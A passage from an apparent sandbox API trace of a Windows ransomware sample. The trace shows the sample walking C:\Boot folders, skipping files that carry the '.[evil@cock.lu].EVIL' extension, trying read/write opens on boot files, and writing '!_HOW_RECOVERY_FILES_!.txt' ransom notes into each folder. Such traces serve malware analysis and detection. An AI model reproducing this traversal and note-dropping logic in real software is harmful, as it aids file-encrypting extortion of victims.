_Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\Resources" | out: _Destination="C:\\\\Boot\\Resources") returned 0x0 [0079.087] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\Resources\\*") returned="C:\\\\Boot\\Resources\\*" [0079.087] FindFirstFileW (in: lpFileName="C:\\\\Boot\\Resources\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0079.087] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.087] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Resources\\.") returned 20 [0079.087] wcscmp (_String1=".", _String2=".") returned 0 [0079.087] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.087] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.087] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Resources\\..") returned 21 [0079.087] wcscmp (_String1=".", _String2="..") returned -1 [0079.087] wcscmp (_String1="..", _String2="..") returned 0 [0079.087] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.087] wcsstr (_Str="bootres.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.087] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Resources\\bootres.dll") returned 30 [0079.087] wcscmp (_String1="bootres.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.087] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootres.dll") returned 0x0 [0079.087] wcslen (_String="C:\\\\Boot\\Resources\\bootres.dll") returned 0x1e [0079.087] CreateFileW (lpFileName="C:\\\\Boot\\Resources\\bootres.dll" (normalized: "c:\\boot\\resources\\bootres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.088] GetLastError () returned 0x5 [0079.088] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.088] wcsstr (_Str="en-US", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.088] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Resources\\en-US") returned 24 [0079.088] wcscmp (_String1=".", _String2="en-US") returned -1 [0079.088] wcscmp (_String1="..", _String2="en-US") returned -1 [0079.088] wcslen (_String="C:\\\\Boot\\Resources\\en-US") returned 0x18 [0079.088] wcscpy_s (in: _Destination=0x84b0fde690, _SizeInWords=0x104, _Source="C:\\\\Boot\\Resources\\en-US" | out: _Destination="C:\\\\Boot\\Resources\\en-US") returned 0x0 [0079.088] wcscat (in: _Dest=0x84b0fde690, _Source="\\*" | out: _Dest="C:\\\\Boot\\Resources\\en-US\\*") returned="C:\\\\Boot\\Resources\\en-US\\*" [0079.088] FindFirstFileW (in: lpFileName="C:\\\\Boot\\Resources\\en-US\\*", lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0x84b11dd860 [0079.088] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.088] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Resources\\en-US\\.") returned 26 [0079.088] wcscmp (_String1=".", _String2=".") returned 0 [0079.088] FindNextFileW (in: hFindFile=0x84b11dd860, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0079.088] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.088] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Resources\\en-US\\..") returned 27 [0079.088] wcscmp (_String1=".", _String2="..") returned -1 [0079.088] wcscmp (_String1="..", _String2="..") returned 0 [0079.088] FindNextFileW (in: hFindFile=0x84b11dd860, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0079.088] wcsstr (_Str="bootres.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.088] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui") returned 40 [0079.088] wcscmp (_String1="bootres.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.088] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootres.dll.mui") returned 0x0 [0079.088] wcslen (_String="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui") returned 0x28 [0079.088] CreateFileW (lpFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.088] GetLastError () returned 0x5 [0079.088] FindNextFileW (in: hFindFile=0x84b11dd860, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0 [0079.088] FindClose (in: hFindFile=0x84b11dd860 | out: hFindFile=0x84b11dd860) returned 1 [0079.089] wcslen (_String="C:\\\\Boot\\Resources\\en-US") returned 0x18 [0079.089] strlen (_Str="${KEY}") returned 0x6 [0079.089] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0079.089] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0079.089] strlen (_Str="${CODE}") returned 0x7 [0079.089] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0079.089] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.089] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.089] _wfsopen (_FileName="C:\\\\Boot\\Resources\\en-US\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0079.089] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0079.089] __uncaught_exception () returned 0x84b1160800 [0079.089] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0079.090] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0079.090] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0079.090] wcslen (_String="C:\\\\Boot\\Resources") returned 0x12 [0079.090] strlen (_Str="${KEY}") returned 0x6 [0079.090] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0079.090] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0079.090] strlen (_Str="${CODE}") returned 0x7 [0079.090] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0079.090] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.090] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.090] _wfsopen (_FileName="C:\\\\Boot\\Resources\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0079.091] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0079.091] __uncaught_exception () returned 0x84b1160800 [0079.091] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0079.091] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0079.091] wcsstr (_Str="ro-RO", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.092] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ro-RO") returned 14 [0079.092] wcscmp (_String1=".", _String2="ro-RO") returned -1 [0079.092] wcscmp (_String1="..", _String2="ro-RO") returned -1 [0079.092] wcslen (_String="C:\\\\Boot\\ro-RO") returned 0xe [0079.092] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\ro-RO" | out: _Destination="C:\\\\Boot\\ro-RO") returned 0x0 [0079.092] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\ro-RO\\*") returned="C:\\\\Boot\\ro-RO\\*" [0079.092] FindFirstFileW (in: lpFileName="C:\\\\Boot\\ro-RO\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0079.092] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.092] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ro-RO\\.") returned 16 [0079.092] wcscmp (_String1=".", _String2=".") returned 0 [0079.092] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.092] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.092] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ro-RO\\..") returned 17 [0079.092] wcscmp (_String1=".", _String2="..") returned -1 [0079.092] wcscmp (_String1="..", _String2="..") returned 0 [0079.092] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.092] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.092] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui") returned 30 [0079.092] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.092] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0079.092] wcslen (_String="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui") returned 0x1e [0079.092] CreateFileW (lpFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.092] GetLastError () returned 0x5 [0079.092] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0079.092] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0079.092] wcslen (_String="C:\\\\Boot\\ro-RO") returned 0xe [0079.092] strlen (_Str="${KEY}") returned 0x6 [0079.092] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0079.092] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0079.092] strlen (_Str="${CODE}") returned 0x7 [0079.092] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0079.093] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.093] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.093] _wfsopen (_FileName="C:\\\\Boot\\ro-RO\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0079.093] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0079.093] __uncaught_exception () returned 0x84b1160800 [0079.093] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0079.094] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0079.094] wcsstr (_Str="ru-RU", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.094] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ru-RU") returned 14 [0079.094] wcscmp (_String1=".", _String2="ru-RU") returned -1 [0079.094] wcscmp (_String1="..", _String2="ru-RU") returned -1 [0079.094] wcslen (_String="C:\\\\Boot\\ru-RU") returned 0xe [0079.094] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\ru-RU" | out: _Destination="C:\\\\Boot\\ru-RU") returned 0x0 [0079.094] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\ru-RU\\*") returned="C:\\\\Boot\\ru-RU\\*" [0079.094] FindFirstFileW (in: lpFileName="C:\\\\Boot\\ru-RU\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0079.094] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.094] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ru-RU\\.") returned 16 [0079.094] wcscmp (_String1=".", _String2=".") returned 0 [0079.094] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.094] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.094] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ru-RU\\..") returned 17 [0079.094] wcscmp (_String1=".", _String2="..") returned -1 [0079.094] wcscmp (_String1="..", _String2="..") returned 0 [0079.094] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.094] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.094] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui") returned 30 [0079.094] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.094] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0079.094] wcslen (_String="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui") returned 0x1e [0079.094] CreateFileW (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.343] GetLastError () returned 0x5 [0079.343] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.343] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.343] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ru-RU\\memtest.exe.mui") returned 30 [0079.343] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.344] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0079.344] wcslen (_String="C:\\\\Boot\\ru-RU\\memtest.exe.mui") returned 0x1e [0079.344] CreateFileW (lpFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.344] GetLastError () returned 0x5 [0079.344] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0079.344] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0079.344] wcslen (_String="C:\\\\Boot\\ru-RU") returned 0xe [0079.344] strlen (_Str="${KEY}") returned 0x6 [0079.344] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0079.344] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0079.344] strlen (_Str="${CODE}") returned 0x7 [0079.344] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0079.344] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.344] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.344] _wfsopen (_FileName="C:\\\\Boot\\ru-RU\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0079.456] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0079.456] __uncaught_exception () returned 0x84b1160800 [0079.456] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0079.459] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0079.459] wcsstr (_Str="sk-SK", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.459] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sk-SK") returned 14 [0079.459] wcscmp (_String1=".", _String2="sk-SK") returned -1 [0079.459] wcscmp (_String1="..", _String2="sk-SK") returned -1 [0079.459] wcslen (_String="C:\\\\Boot\\sk-SK") returned 0xe [0079.459] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\sk-SK" | out: _Destination="C:\\\\Boot\\sk-SK") returned 0x0 [0079.459] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\sk-SK\\*") returned="C:\\\\Boot\\sk-SK\\*" [0079.459] FindFirstFileW (in: lpFileName="C:\\\\Boot\\sk-SK\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0079.460] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.460] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sk-SK\\.") returned 16 [0079.460] wcscmp (_String1=".", _String2=".") returned 0 [0079.460] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.460] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.460] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sk-SK\\..") returned 17 [0079.460] wcscmp (_String1=".", _String2="..") returned -1 [0079.460] wcscmp (_String1="..", _String2="..") returned 0 [0079.460] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.460] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.460] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui") returned 30 [0079.460] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.460] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0079.460] wcslen (_String="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui") returned 0x1e [0079.460] CreateFileW (lpFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.460] GetLastError () returned 0x5 [0079.460] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0079.460] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0079.460] wcslen (_String="C:\\\\Boot\\sk-SK") returned 0xe [0079.460] strlen (_Str="${KEY}") returned 0x6 [0079.460] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0079.460] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0079.460] strlen (_Str="${CODE}") returned 0x7 [0079.460] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0079.461] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.461] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.461] _wfsopen (_FileName="C:\\\\Boot\\sk-SK\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0079.461] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0079.461] __uncaught_exception () returned 0x84b1160800 [0079.461] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0079.462] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0079.462] wcsstr (_Str="sl-SI", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.462] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sl-SI") returned 14 [0079.462] wcscmp (_String1=".", _String2="sl-SI") returned -1 [0079.462] wcscmp (_String1="..", _String2="sl-SI") returned -1 [0079.462] wcslen (_String="C:\\\\Boot\\sl-SI") returned 0xe [0079.462] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\sl-SI" | out: _Destination="C:\\\\Boot\\sl-SI") returned 0x0 [0079.462] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\sl-SI\\*") returned="C:\\\\Boot\\sl-SI\\*" [0079.462] FindFirstFileW (in: lpFileName="C:\\\\Boot\\sl-SI\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0079.524] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.524] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sl-SI\\.") returned 16 [0079.524] wcscmp (_String1=".", _String2=".") returned 0 [0079.524] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.524] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.524] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sl-SI\\..") returned 17 [0079.524] wcscmp (_String1=".", _String2="..") returned -1 [0079.524] wcscmp (_String1="..", _String2="..") returned 0 [0079.524] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.524] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.524] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui") returned 30 [0079.524] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.524] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0079.524] wcslen (_String="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui") returned 0x1e [0079.524] CreateFileW (lpFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.525] GetLastError () returned 0x5 [0079.525] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0079.525] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0079.525] wcslen (_String="C:\\\\Boot\\sl-SI") returned 0xe [0079.525] strlen (_Str="${KEY}") returned 0x6 [0079.525] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0079.525] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0079.525] strlen (_Str="${CODE}") returned 0x7 [0079.525] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0079.525] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.525] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.525] _wfsopen (_FileName="C:\\\\Boot\\sl-SI\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0079.525] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0079.525] __uncaught_exception () returned 0x84b1160800 [0079.525] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0079.526] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0079.526] wcsstr (_Str="sr-Latn-CS", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.526] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\sr-Latn-CS") returned 19 [0079.526] wcscmp (_String1=".", _String2="sr-Latn-CS") returned -1 [0079.526] wcscmp (_String1="..", _String2="sr-Latn-CS") returned -1 [0079.526] wcslen (_String="C:\\\\Boot\\sr-Latn-CS") returned 0x13 [0079.526] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\sr-Latn-CS" | out: _Destination="C:\\\\Boot\\sr-Latn-CS") returned 0x0 [0079.526] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\sr-Latn-CS\\*") returned="C:\\\\Boot\\sr-Latn-CS\\*" [0079.526] FindFirstFileW (in: lpFileName="C:\\\\Boot\\sr-Latn-CS\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0079.526] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.526] 